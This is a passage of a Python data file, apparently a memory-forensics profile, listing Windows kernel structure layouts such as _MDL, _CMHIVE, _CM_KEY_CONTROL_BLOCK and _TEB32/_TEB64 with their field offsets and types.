'CurrentTime' : [ 0x8, ['_LARGE_INTEGER']],
'AvailablePages' : [ 0x10, ['unsigned long']],
'ModifiedPagesTotal' : [ 0x14, ['unsigned long']],
'ModifiedPagefilePages' : [ 0x18, ['unsigned long']],
'ModifiedNoWritePages' : [ 0x1c, ['unsigned long']],
'MdlHack' : [ 0x20, ['__unnamed_159e']],
} ],
'__unnamed_15a4' : [ 0x8, {
'IoStatus' : [ 0x0, ['_IO_STATUS_BLOCK']],
} ],
'__unnamed_15a6' : [ 0x4, {
'KeepForever' : [ 0x0, ['unsigned long']],
} ],
'_MMMOD_WRITER_MDL_ENTRY' : [ 0x60, {
'Links' : [ 0x0, ['_LIST_ENTRY']],
'u' : [ 0x8, ['__unnamed_15a4']],
'Irp' : [ 0x10, ['pointer', ['_IRP']]],
'u1' : [ 0x14, ['__unnamed_15a6']],
'PagingFile' : [ 0x18, ['pointer', ['_MMPAGING_FILE']]],
'File' : [ 0x1c, ['pointer', ['_FILE_OBJECT']]],
'ControlArea' : [ 0x20, ['pointer', ['_CONTROL_AREA']]],
'FileResource' : [ 0x24, ['pointer', ['_ERESOURCE']]],
'WriteOffset' : [ 0x28, ['_LARGE_INTEGER']],
'IssueTime' : [ 0x30, ['_LARGE_INTEGER']],
'PointerMdl' : [ 0x38, ['pointer', ['_MDL']]],
'Mdl' : [ 0x3c, ['_MDL']],
'Page' : [ 0x58, ['array', 1, ['unsigned long']]],
} ],
'_MDL' : [ 0x1c, {
'Next' : [ 0x0, ['pointer', ['_MDL']]],
'Size' : [ 0x4, ['short']],
'MdlFlags' : [ 0x6, ['short']],
'Process' : [ 0x8, ['pointer', ['_EPROCESS']]],
'MappedSystemVa' : [ 0xc, ['pointer', ['void']]],
'StartVa' : [ 0x10, ['pointer', ['void']]],
'ByteCount' : [ 0x14, ['unsigned long']],
'ByteOffset' : [ 0x18, ['unsigned long']],
} ],
'_HHIVE' : [ 0x2ec, {
'Signature' : [ 0x0, ['unsigned long']],
'GetCellRoutine' : [ 0x4, ['pointer', ['void']]],
'ReleaseCellRoutine' : [ 0x8, ['pointer', ['void']]],
'Allocate' : [ 0xc, ['pointer', ['void']]],
'Free' : [ 0x10, ['pointer', ['void']]],
'FileSetSize' : [ 0x14, ['pointer', ['void']]],
'FileWrite' : [ 0x18, ['pointer', ['void']]],
'FileRead' : [ 0x1c, ['pointer', ['void']]],
'FileFlush' : [ 0x20, ['pointer', ['void']]],
'HiveLoadFailure' : [ 0x24, ['pointer', ['void']]],
'BaseBlock' : [ 0x28, ['pointer', ['_HBASE_BLOCK']]],
'DirtyVector' : [ 0x2c, ['_RTL_BITMAP']],
'DirtyCount' : [ 0x34, ['unsigned long']],
'DirtyAlloc' : [ 0x38, ['unsigned long']],
'BaseBlockAlloc' : [ 0x3c, ['unsigned long']],
'Cluster' : [ 0x40, ['unsigned long']],
'Flat' : [ 0x44, ['unsigned char']],
'ReadOnly' : [ 0x45, ['unsigned char']],
'DirtyFlag' : [ 0x46, ['unsigned char']],
'HvBinHeadersUse' : [ 0x48, ['unsigned long']],
'HvFreeCellsUse' : [ 0x4c, ['unsigned long']],
'HvUsedCellsUse' : [ 0x50, ['unsigned long']],
'CmUsedCellsUse' : [ 0x54, ['unsigned long']],
'HiveFlags' : [ 0x58, ['unsigned long']],
'CurrentLog' : [ 0x5c, ['unsigned long']],
'LogSize' : [ 0x60, ['array', 2, ['unsigned long']]],
'RefreshCount' : [ 0x68, ['unsigned long']],
'StorageTypeCount' : [ 0x6c, ['unsigned long']],
'Version' : [ 0x70, ['unsigned long']],
'Storage' : [ 0x74, ['array', 2, ['_DUAL']]],
} ],
'_CM_VIEW_OF_FILE' : [ 0x30, {
'MappedViewLinks' : [ 0x0, ['_LIST_ENTRY']],
'PinnedViewLinks' : [ 0x8, ['_LIST_ENTRY']],
'FlushedViewLinks' : [ 0x10, ['_LIST_ENTRY']],
'CmHive' : [ 0x18, ['pointer', ['_CMHIVE']]],
'Bcb' : [ 0x1c, ['pointer', ['void']]],
'ViewAddress' : [ 0x20, ['pointer', ['void']]],
'FileOffset' : [ 0x24, ['unsigned long']],
'Size' : [ 0x28, ['unsigned long']],
'UseCount' : [ 0x2c, ['unsigned long']],
} ],
'_CMHIVE' : [ 0x630, {
'Hive' : [ 0x0, ['_HHIVE']],
'FileHandles' : [ 0x2ec, ['array', 6, ['pointer', ['void']]]],
'NotifyList' : [ 0x304, ['_LIST_ENTRY']],
'HiveList' : [ 0x30c, ['_LIST_ENTRY']],
'PreloadedHiveList' : [ 0x314, ['_LIST_ENTRY']],
'HiveRundown' : [ 0x31c, ['_EX_RUNDOWN_REF']],
'ParseCacheEntries' : [ 0x320, ['_LIST_ENTRY']],
'KcbCacheTable' : [ 0x328, ['pointer', ['_CM_KEY_HASH_TABLE_ENTRY']]],
'KcbCacheTableSize' : [ 0x32c, ['unsigned long']],
'Identity' : [ 0x330, ['unsigned long']],
'HiveLock' : [ 0x334, ['pointer', ['_FAST_MUTEX']]],
'ViewLock' : [ 0x338, ['_EX_PUSH_LOCK']],
'ViewLockOwner' : [ 0x33c, ['pointer', ['_KTHREAD']]],
'ViewLockLast' : [ 0x340, ['unsigned long']],
'ViewUnLockLast' : [ 0x344, ['unsigned long']],
'WriterLock' : [ 0x348, ['pointer', ['_FAST_MUTEX']]],
'FlusherLock' : [ 0x34c, ['pointer', ['_ERESOURCE']]],
'FlushDirtyVector' : [ 0x350, ['_RTL_BITMAP']],
'FlushOffsetArray' : [ 0x358, ['pointer', ['CMP_OFFSET_ARRAY']]],
'FlushOffsetArrayCount' : [ 0x35c, ['unsigned long']],
'FlushHiveTruncated' : [ 0x360, ['unsigned long']],
'FlushLock2' : [ 0x364, ['pointer', ['_FAST_MUTEX']]],
'SecurityLock' : [ 0x368, ['_EX_PUSH_LOCK']],
'MappedViewList' : [ 0x36c, ['_LIST_ENTRY']],
'PinnedViewList' : [ 0x374, ['_LIST_ENTRY']],
'FlushedViewList' : [ 0x37c, ['_LIST_ENTRY']],
'MappedViewCount' : [ 0x384, ['unsigned short']],
'PinnedViewCount' : [ 0x386, ['unsigned short']],
'UseCount' : [ 0x388, ['unsigned long']],
'ViewsPerHive' : [ 0x38c, ['unsigned long']],
'FileObject' : [ 0x390, ['pointer', ['_FILE_OBJECT']]],
'LastShrinkHiveSize' : [ 0x394, ['unsigned long']],
'ActualFileSize' : [ 0x398, ['_LARGE_INTEGER']],
'FileFullPath' : [ 0x3a0, ['_UNICODE_STRING']],
'FileUserName' : [ 0x3a8, ['_UNICODE_STRING']],
'HiveRootPath' : [ 0x3b0, ['_UNICODE_STRING']],
'SecurityCount' : [ 0x3b8, ['unsigned long']],
'SecurityCacheSize' : [ 0x3bc, ['unsigned long']],
'SecurityHitHint' : [ 0x3c0, ['long']],
'SecurityCache' : [ 0x3c4, ['pointer', ['_CM_KEY_SECURITY_CACHE_ENTRY']]],
'SecurityHash' : [ 0x3c8, ['array', 64, ['_LIST_ENTRY']]],
'UnloadEventCount' : [ 0x5c8, ['unsigned long']],
'UnloadEventArray' : [ 0x5cc, ['pointer', ['pointer', ['_KEVENT']]]],
'RootKcb' : [ 0x5d0, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'Frozen' : [ 0x5d4, ['unsigned char']],
'UnloadWorkItem' : [ 0x5d8, ['pointer', ['_CM_WORKITEM']]],
'UnloadWorkItemHolder' : [ 0x5dc, ['_CM_WORKITEM']],
'GrowOnlyMode' : [ 0x5f0, ['unsigned char']],
'GrowOffset' : [ 0x5f4, ['unsigned long']],
'KcbConvertListHead' : [ 0x5f8, ['_LIST_ENTRY']],
'KnodeConvertListHead' : [ 0x600, ['_LIST_ENTRY']],
'CellRemapArray' : [ 0x608, ['pointer', ['_CM_CELL_REMAP_BLOCK']]],
'Flags' : [ 0x60c, ['unsigned long']],
'TrustClassEntry' : [ 0x610, ['_LIST_ENTRY']],
'FlushCount' : [ 0x618, ['unsigned long']],
'CmRm' : [ 0x61c, ['pointer', ['_CM_RM']]],
'CmRmInitFailPoint' : [ 0x620, ['unsigned long']],
'CmRmInitFailStatus' : [ 0x624, ['long']],
'CreatorOwner' : [ 0x628, ['pointer', ['_KTHREAD']]],
'RundownThread' : [ 0x62c, ['pointer', ['_KTHREAD']]],
} ],
'_CM_KEY_CONTROL_BLOCK' : [ 0xa0, {
'RefCount' : [ 0x0, ['unsigned long']],
'ExtFlags' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'PrivateAlloc' : [ 0x4, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'Delete' : [ 0x4, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'HiveUnloaded' : [ 0x4, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'Decommissioned' : [ 0x4, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'LockTablePresent' : [ 0x4, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'TotalLevels' : [ 0x4, ['BitField', dict(start_bit = 21, end_bit = 31, native_type='unsigned long')]],
'DelayedDeref' : [ 0x8, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DelayedClose' : [ 0x8, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Parking' : [ 0x8, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'KeyHash' : [ 0xc, ['_CM_KEY_HASH']],
'ConvKey' : [ 0xc, ['unsigned long']],
'NextHash' : [ 0x10, ['pointer', ['_CM_KEY_HASH']]],
'KeyHive' : [ 0x14, ['pointer', ['_HHIVE']]],
'KeyCell' : [ 0x18, ['unsigned long']],
'KcbPushlock' : [ 0x1c, ['_EX_PUSH_LOCK']],
'Owner' : [ 0x20, ['pointer', ['_KTHREAD']]],
'SharedCount' : [ 0x20, ['long']],
'SlotHint' : [ 0x24, ['unsigned long']],
'ParentKcb' : [ 0x28, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'NameBlock' : [ 0x2c, ['pointer', ['_CM_NAME_CONTROL_BLOCK']]],
'CachedSecurity' : [ 0x30, ['pointer', ['_CM_KEY_SECURITY_CACHE']]],
'ValueCache' : [ 0x34, ['_CACHED_CHILD_LIST']],
'IndexHint' : [ 0x3c, ['pointer', ['_CM_INDEX_HINT_BLOCK']]],
'HashKey' : [ 0x3c, ['unsigned long']],
'SubKeyCount' : [ 0x3c, ['unsigned long']],
'KeyBodyListHead' : [ 0x40, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0x40, ['_LIST_ENTRY']],
'KeyBodyArray' : [ 0x48, ['array', 4, ['pointer', ['_CM_KEY_BODY']]]],
'KcbLastWriteTime' : [ 0x58, ['_LARGE_INTEGER']],
'KcbMaxNameLen' : [ 0x60, ['unsigned short']],
'KcbMaxValueNameLen' : [ 0x62, ['unsigned short']],
'KcbMaxValueDataLen' : [ 0x64, ['unsigned long']],
'KcbUserFlags' : [ 0x68, ['BitField', dict(start_bit = 0, end_bit = 4, native_type='unsigned long')]],
'KcbVirtControlFlags' : [ 0x68, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned long')]],
'KcbDebug' : [ 0x68, ['BitField', dict(start_bit = 8, end_bit = 16, native_type='unsigned long')]],
'Flags' : [ 0x68, ['BitField', dict(start_bit = 16, end_bit = 32, native_type='unsigned long')]],
'KCBUoWListHead' : [ 0x6c, ['_LIST_ENTRY']],
'DelayQueueEntry' : [ 0x74, ['_LIST_ENTRY']],
'Stolen' : [ 0x74, ['pointer', ['unsigned char']]],
'TransKCBOwner' : [ 0x7c, ['pointer', ['_CM_TRANS']]],
'KCBLock' : [ 0x80, ['_CM_INTENT_LOCK']],
'KeyLock' : [ 0x88, ['_CM_INTENT_LOCK']],
'TransValueCache' : [ 0x90, ['_CHILD_LIST']],
'TransValueListOwner' : [ 0x98, ['pointer', ['_CM_TRANS']]],
'FullKCBName' : [ 0x9c, ['pointer', ['_UNICODE_STRING']]],
} ],
'_CM_KEY_HASH_TABLE_ENTRY' : [ 0xc, {
'Lock' : [ 0x0, ['_EX_PUSH_LOCK']],
'Owner' : [ 0x4, ['pointer', ['_KTHREAD']]],
'Entry' : [ 0x8, ['pointer', ['_CM_KEY_HASH']]],
} ],
'__unnamed_162b' : [ 0xc, {
'Failure' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: '_None', 1: '_CmInitializeHive', 2: '_HvInitializeHive', 3: '_HvpBuildMap', 4: '_HvpBuildMapAndCopy', 5: '_HvpInitMap', 6: '_HvLoadHive', 7: '_HvpReadFileImageAndBuildMap', 8: '_HvpRecoverData', 9: '_HvpRecoverWholeHive', 10: '_HvpMapFileImageAndBuildMap', 11: '_CmpValidateHiveSecurityDescriptors', 12: '_HvpEnlistBinInMap', 13: '_CmCheckRegistry', 14: '_CmRegistryIO', 15: '_CmCheckRegistry2', 16: '_CmpCheckKey', 17: '_CmpCheckValueList', 18: '_HvCheckHive', 19: '_HvCheckBin'})]],
'Status' : [ 0x4, ['long']],
'Point' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_162e' : [ 0xc, {
'Action' : [ 0x0, ['unsigned long']],
'Handle' : [ 0x4, ['pointer', ['void']]],
'Status' : [ 0x8, ['long']],
} ],
'__unnamed_1630' : [ 0x4, {
'CheckStack' : [ 0x0, ['pointer', ['void']]],
} ],
'__unnamed_1632' : [ 0x10, {
'Cell' : [ 0x0, ['unsigned long']],
'CellPoint' : [ 0x4, ['pointer', ['_CELL_DATA']]],
'RootPoint' : [ 0x8, ['pointer', ['void']]],
'Index' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_1634' : [ 0x10, {
'List' : [ 0x0, ['pointer', ['_CELL_DATA']]],
'Index' : [ 0x4, ['unsigned long']],
'Cell' : [ 0x8, ['unsigned long']],
'CellPoint' : [ 0xc, ['pointer', ['_CELL_DATA']]],
} ],
'__unnamed_1638' : [ 0xc, {
'Space' : [ 0x0, ['unsigned long']],
'MapPoint' : [ 0x4, ['unsigned long']],
'BinPoint' : [ 0x8, ['pointer', ['_HBIN']]],
} ],
'__unnamed_163c' : [ 0x8, {
'Bin' : [ 0x0, ['pointer', ['_HBIN']]],
'CellPoint' : [ 0x4, ['pointer', ['_HCELL']]],
} ],
'__unnamed_163e' : [ 0x4, {
'FileOffset' : [ 0x0, ['unsigned long']],
} ],
'_HIVE_LOAD_FAILURE' : [ 0x120, {
'Hive' : [ 0x0, ['pointer', ['_HHIVE']]],
'Index' : [ 0x4, ['unsigned long']],
'RecoverableIndex' : [ 0x8, ['unsigned long']],
'Locations' : [ 0xc, ['array', 8, ['__unnamed_162b']]],
'RecoverableLocations' : [ 0x6c, ['array', 8, ['__unnamed_162b']]],
'RegistryIO' : [ 0xcc, ['__unnamed_162e']],
'CheckRegistry2' : [ 0xd8, ['__unnamed_1630']],
'CheckKey' : [ 0xdc, ['__unnamed_1632']],
'CheckValueList' : [ 0xec, ['__unnamed_1634']],
'CheckHive' : [ 0xfc, ['__unnamed_1638']],
'CheckHive1' : [ 0x108, ['__unnamed_1638']],
'CheckBin' : [ 0x114, ['__unnamed_163c']],
'RecoverData' : [ 0x11c, ['__unnamed_163e']],
} ],
'_PCW_COUNTER_DESCRIPTOR' : [ 0x8, {
'Id' : [ 0x0, ['unsigned short']],
'StructIndex' : [ 0x2, ['unsigned short']],
'Offset' : [ 0x4, ['unsigned short']],
'Size' : [ 0x6, ['unsigned short']],
} ],
'_PCW_REGISTRATION_INFORMATION' : [ 0x18, {
'Version' : [ 0x0, ['unsigned long']],
'Name' : [ 0x4, ['pointer', ['_UNICODE_STRING']]],
'CounterCount' : [ 0x8, ['unsigned long']],
'Counters' : [ 0xc, ['pointer', ['_PCW_COUNTER_DESCRIPTOR']]],
'Callback' : [ 0x10, ['pointer', ['void']]],
'CallbackContext' : [ 0x14, ['pointer', ['void']]],
} ],
'_PCW_PROCESSOR_INFO' : [ 0x80, {
'IdleTime' : [ 0x0, ['unsigned long long']],
'AvailableTime' : [ 0x8, ['unsigned long long']],
'UserTime' : [ 0x10, ['unsigned long long']],
'KernelTime' : [ 0x18, ['unsigned long long']],
'Interrupts' : [ 0x20, ['unsigned long']],
'DpcTime' : [ 0x28, ['unsigned long long']],
'InterruptTime' : [ 0x30, ['unsigned long long']],
'DpcCount' : [ 0x38, ['unsigned long']],
'DpcRate' : [ 0x3c, ['unsigned long']],
'C1Time' : [ 0x40, ['unsigned long long']],
'C2Time' : [ 0x48, ['unsigned long long']],
'C3Time' : [ 0x50, ['unsigned long long']],
'C1Transitions' : [ 0x58, ['unsigned long long']],
'C2Transitions' : [ 0x60, ['unsigned long long']],
'C3Transitions' : [ 0x68, ['unsigned long long']],
'ParkingStatus' : [ 0x70, ['unsigned long']],
'CurrentFrequency' : [ 0x74, ['unsigned long']],
'PercentMaxFrequency' : [ 0x78, ['unsigned long']],
'StateFlags' : [ 0x7c, ['unsigned long']],
} ],
'_PCW_DATA' : [ 0x8, {
'Data' : [ 0x0, ['pointer', ['void']]],
'Size' : [ 0x4, ['unsigned long']],
} ],
'_ETW_PERF_COUNTERS' : [ 0x18, {
'TotalActiveSessions' : [ 0x0, ['long']],
'TotalBufferMemoryNonPagedPool' : [ 0x4, ['long']],
'TotalBufferMemoryPagedPool' : [ 0x8, ['long']],
'TotalGuidsEnabled' : [ 0xc, ['long']],
'TotalGuidsNotEnabled' : [ 0x10, ['long']],
'TotalGuidsPreEnabled' : [ 0x14, ['long']],
} ],
'_ETW_SESSION_PERF_COUNTERS' : [ 0x18, {
'BufferMemoryPagedPool' : [ 0x0, ['long']],
'BufferMemoryNonPagedPool' : [ 0x4, ['long']],
'EventsLoggedCount' : [ 0x8, ['unsigned long long']],
'EventsLost' : [ 0x10, ['long']],
'NumConsumers' : [ 0x14, ['long']],
} ],
'_TEB32' : [ 0xfe4, {
'NtTib' : [ 0x0, ['_NT_TIB32']],
'EnvironmentPointer' : [ 0x1c, ['unsigned long']],
'ClientId' : [ 0x20, ['_CLIENT_ID32']],
'ActiveRpcHandle' : [ 0x28, ['unsigned long']],
'ThreadLocalStoragePointer' : [ 0x2c, ['unsigned long']],
'ProcessEnvironmentBlock' : [ 0x30, ['unsigned long']],
'LastErrorValue' : [ 0x34, ['unsigned long']],
'CountOfOwnedCriticalSections' : [ 0x38, ['unsigned long']],
'CsrClientThread' : [ 0x3c, ['unsigned long']],
'Win32ThreadInfo' : [ 0x40, ['unsigned long']],
'User32Reserved' : [ 0x44, ['array', 26, ['unsigned long']]],
'UserReserved' : [ 0xac, ['array', 5, ['unsigned long']]],
'WOW32Reserved' : [ 0xc0, ['unsigned long']],
'CurrentLocale' : [ 0xc4, ['unsigned long']],
'FpSoftwareStatusRegister' : [ 0xc8, ['unsigned long']],
'SystemReserved1' : [ 0xcc, ['array', 54, ['unsigned long']]],
'ExceptionCode' : [ 0x1a4, ['long']],
'ActivationContextStackPointer' : [ 0x1a8, ['unsigned long']],
'SpareBytes' : [ 0x1ac, ['array', 36, ['unsigned char']]],
'TxFsContext' : [ 0x1d0, ['unsigned long']],
'GdiTebBatch' : [ 0x1d4, ['_GDI_TEB_BATCH32']],
'RealClientId' : [ 0x6b4, ['_CLIENT_ID32']],
'GdiCachedProcessHandle' : [ 0x6bc, ['unsigned long']],
'GdiClientPID' : [ 0x6c0, ['unsigned long']],
'GdiClientTID' : [ 0x6c4, ['unsigned long']],
'GdiThreadLocalInfo' : [ 0x6c8, ['unsigned long']],
'Win32ClientInfo' : [ 0x6cc, ['array', 62, ['unsigned long']]],
'glDispatchTable' : [ 0x7c4, ['array', 233, ['unsigned long']]],
'glReserved1' : [ 0xb68, ['array', 29, ['unsigned long']]],
'glReserved2' : [ 0xbdc, ['unsigned long']],
'glSectionInfo' : [ 0xbe0, ['unsigned long']],
'glSection' : [ 0xbe4, ['unsigned long']],
'glTable' : [ 0xbe8, ['unsigned long']],
'glCurrentRC' : [ 0xbec, ['unsigned long']],
'glContext' : [ 0xbf0, ['unsigned long']],
'LastStatusValue' : [ 0xbf4, ['unsigned long']],
'StaticUnicodeString' : [ 0xbf8, ['_STRING32']],
'StaticUnicodeBuffer' : [ 0xc00, ['array', 261, ['wchar']]],
'DeallocationStack' : [ 0xe0c, ['unsigned long']],
'TlsSlots' : [ 0xe10, ['array', 64, ['unsigned long']]],
'TlsLinks' : [ 0xf10, ['LIST_ENTRY32']],
'Vdm' : [ 0xf18, ['unsigned long']],
'ReservedForNtRpc' : [ 0xf1c, ['unsigned long']],
'DbgSsReserved' : [ 0xf20, ['array', 2, ['unsigned long']]],
'HardErrorMode' : [ 0xf28, ['unsigned long']],
'Instrumentation' : [ 0xf2c, ['array', 9, ['unsigned long']]],
'ActivityId' : [ 0xf50, ['_GUID']],
'SubProcessTag' : [ 0xf60, ['unsigned long']],
'EtwLocalData' : [ 0xf64, ['unsigned long']],
'EtwTraceData' : [ 0xf68, ['unsigned long']],
'WinSockData' : [ 0xf6c, ['unsigned long']],
'GdiBatchCount' : [ 0xf70, ['unsigned long']],
'CurrentIdealProcessor' : [ 0xf74, ['_PROCESSOR_NUMBER']],
'IdealProcessorValue' : [ 0xf74, ['unsigned long']],
'ReservedPad0' : [ 0xf74, ['unsigned char']],
'ReservedPad1' : [ 0xf75, ['unsigned char']],
'ReservedPad2' : [ 0xf76, ['unsigned char']],
'IdealProcessor' : [ 0xf77, ['unsigned char']],
'GuaranteedStackBytes' : [ 0xf78, ['unsigned long']],
'ReservedForPerf' : [ 0xf7c, ['unsigned long']],
'ReservedForOle' : [ 0xf80, ['unsigned long']],
'WaitingOnLoaderLock' : [ 0xf84, ['unsigned long']],
'SavedPriorityState' : [ 0xf88, ['unsigned long']],
'SoftPatchPtr1' : [ 0xf8c, ['unsigned long']],
'ThreadPoolData' : [ 0xf90, ['unsigned long']],
'TlsExpansionSlots' : [ 0xf94, ['unsigned long']],
'MuiGeneration' : [ 0xf98, ['unsigned long']],
'IsImpersonating' : [ 0xf9c, ['unsigned long']],
'NlsCache' : [ 0xfa0, ['unsigned long']],
'pShimData' : [ 0xfa4, ['unsigned long']],
'HeapVirtualAffinity' : [ 0xfa8, ['unsigned long']],
'CurrentTransactionHandle' : [ 0xfac, ['unsigned long']],
'ActiveFrame' : [ 0xfb0, ['unsigned long']],
'FlsData' : [ 0xfb4, ['unsigned long']],
'PreferredLanguages' : [ 0xfb8, ['unsigned long']],
'UserPrefLanguages' : [ 0xfbc, ['unsigned long']],
'MergedPrefLanguages' : [ 0xfc0, ['unsigned long']],
'MuiImpersonation' : [ 0xfc4, ['unsigned long']],
'CrossTebFlags' : [ 0xfc8, ['unsigned short']],
'SpareCrossTebBits' : [ 0xfc8, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned short')]],
'SameTebFlags' : [ 0xfca, ['unsigned short']],
'SafeThunkCall' : [ 0xfca, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'InDebugPrint' : [ 0xfca, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'HasFiberData' : [ 0xfca, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned short')]],
'SkipThreadAttach' : [ 0xfca, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned short')]],
'WerInShipAssertCode' : [ 0xfca, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned short')]],
'RanProcessInit' : [ 0xfca, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned short')]],
'ClonedThread' : [ 0xfca, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned short')]],
'SuppressDebugMsg' : [ 0xfca, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned short')]],
'DisableUserStackWalk' : [ 0xfca, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned short')]],
'RtlExceptionAttached' : [ 0xfca, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned short')]],
'InitialThread' : [ 0xfca, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned short')]],
'SpareSameTebBits' : [ 0xfca, ['BitField', dict(start_bit = 11, end_bit = 16, native_type='unsigned short')]],
'TxnScopeEnterCallback' : [ 0xfcc, ['unsigned long']],
'TxnScopeExitCallback' : [ 0xfd0, ['unsigned long']],
'TxnScopeContext' : [ 0xfd4, ['unsigned long']],
'LockCount' : [ 0xfd8, ['unsigned long']],
'SpareUlong0' : [ 0xfdc, ['unsigned long']],
'ResourceRetValue' : [ 0xfe0, ['unsigned long']],
} ],
'_TEB64' : [ 0x1818, {
'NtTib' : [ 0x0, ['_NT_TIB64']],
'EnvironmentPointer' : [ 0x38, ['unsigned long long']],
'ClientId' : [ 0x40, ['_CLIENT_ID64']],
'ActiveRpcHandle' : [ 0x50, ['unsigned long long']],
'ThreadLocalStoragePointer' : [ 0x58, ['unsigned long long']],
'ProcessEnvironmentBlock' : [ 0x60, ['unsigned long long']],
'LastErrorValue' : [ 0x68, ['unsigned long']],
'CountOfOwnedCriticalSections' : [ 0x6c, ['unsigned long']],
'CsrClientThread' : [ 0x70, ['unsigned long long']],
'Win32ThreadInfo' : [ 0x78, ['unsigned long long']],
'User32Reserved' : [ 0x80, ['array', 26, ['unsigned long']]],
'UserReserved' : [ 0xe8, ['array', 5, ['unsigned long']]],
'WOW32Reserved' : [ 0x100, ['unsigned long long']],
'CurrentLocale' : [ 0x108, ['unsigned long']],
'FpSoftwareStatusRegister' : [ 0x10c, ['unsigned long']],
'SystemReserved1' : [ 0x110, ['array', 54, ['unsigned long long']]],
'ExceptionCode' : [ 0x2c0, ['long']],
'ActivationContextStackPointer' : [ 0x2c8, ['unsigned long long']],
'SpareBytes' : [ 0x2d0, ['array', 24, ['unsigned char']]],
'TxFsContext' : [ 0x2e8, ['unsigned long']],
'GdiTebBatch' : [ 0x2f0, ['_GDI_TEB_BATCH64']],
'RealClientId' : [ 0x7d8, ['_CLIENT_ID64']],
'GdiCachedProcessHandle' : [ 0x7e8, ['unsigned long long']],
'GdiClientPID' : [ 0x7f0, ['unsigned long']],
'GdiClientTID' : [ 0x7f4, ['unsigned long']],
'GdiThreadLocalInfo' : [ 0x7f8, ['unsigned long long']],
'Win32ClientInfo' : [ 0x800, ['array', 62, ['unsigned long long']]],
'glDispatchTable' : [ 0x9f0, ['array', 233, ['unsigned long long']]],
'glReserved1' : [ 0x1138, ['array', 29, ['unsigned long long']]],
'glReserved2' : [ 0x1220, ['unsigned long long']],
'glSectionInfo' : [ 0x1228, ['unsigned long long']],
'glSection' : [ 0x1230, ['unsigned long long']],
'glTable' : [ 0x1238, ['unsigned long long']],
'glCurrentRC' : [ 0x1240, ['unsigned long long']],
'glContext' : [ 0x1248, ['unsigned long long']],
'LastStatusValue' : [ 0x1250, ['unsigned long']],
'StaticUnicodeString' : [ 0x1258, ['_STRING64']],
'StaticUnicodeBuffer' : [ 0x1268, ['array', 261, ['wchar']]],
'DeallocationStack' : [ 0x1478, ['unsigned long long']],
'TlsSlots' : [ 0x1480, ['array', 64, ['unsigned long long']]],
'TlsLinks' : [ 0x1680, ['LIST_ENTRY64']],
'Vdm' : [ 0x1690, ['unsigned long long']],
'ReservedForNtRpc' : [ 0x1698, ['unsigned long long']],
'DbgSsReserved' : [ 0x16a0, ['array', 2, ['unsigned long long']]],
'HardErrorMode' : [ 0x16b0, ['unsigned long']],
'Instrumentation' : [ 0x16b8, ['array', 11, ['unsigned long long']]],
'ActivityId' : [ 0x1710, ['_GUID']],
'SubProcessTag' : [ 0x1720, ['unsigned long long']],
'EtwLocalData' : [ 0x1728, ['unsigned long long']],
'EtwTraceData' : [ 0x1730, ['unsigned long long']],
'WinSockData' : [ 0x1738, ['unsigned long long']],
'GdiBatchCount' : [ 0x1740, ['unsigned long']],
'CurrentIdealProcessor' : [ 0x1744, ['_PROCESSOR_NUMBER']],
'IdealProcessorValue' : [ 0x1744, ['unsigned long']],
'ReservedPad0' : [ 0x1744, ['unsigned char']],
'ReservedPad1' : [ 0x1745, ['unsigned char']],
'ReservedPad2' : [ 0x1746, ['unsigned char']],
'IdealProcessor' : [ 0x1747, ['unsigned char']],
'GuaranteedStackBytes' : [ 0x1748, ['unsigned long']],
'ReservedForPerf' : [ 0x1750, ['unsigned long long']],
'ReservedForOle' : [ 0x1758, ['unsigned long long']],
'WaitingOnLoaderLock' : [ 0x1760, ['unsigned long']],
'SavedPriorityState' : [ 0x1768, ['unsigned long long']],
'SoftPatchPtr1' : [ 0x1770, ['unsigned long long']],
'ThreadPoolData' : [ 0x1778, ['unsigned long long']],
'TlsExpansionSlots' : [ 0x1780, ['unsigned long long']],
'DeallocationBStore' : [ 0x1788, ['unsigned long long']],
'BStoreLimit' : [ 0x1790, ['unsigned long long']],
'MuiGeneration' : [ 0x1798, ['unsigned long']],
'IsImpersonating' : [ 0x179c, ['unsigned long']],
'NlsCache' : [ 0x17a0, ['unsigned long long']],
'pShimData' : [ 0x17a8, ['unsigned long long']],
'HeapVirtualAffinity' : [ 0x17b0, ['unsigned long']],
'CurrentTransactionHandle' : [ 0x17b8, ['unsigned long long']],
'ActiveFrame' : [ 0x17c0, ['unsigned long long']],
'FlsData' : [ 0x17c8, ['unsigned long long']],
'PreferredLanguages' : [ 0x17d0, ['unsigned long long']],
'UserPrefLanguages' : [ 0x17d8, ['unsigned long long']],
'MergedPrefLanguages' : [ 0x17e0, ['unsigned long long']],
'MuiImpersonation' : [ 0x17e8, ['unsigned long']],
'CrossTebFlags' : [ 0x17ec, ['unsigned short']],
'SpareCrossTebBits' : [ 0x17ec, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned short')]],
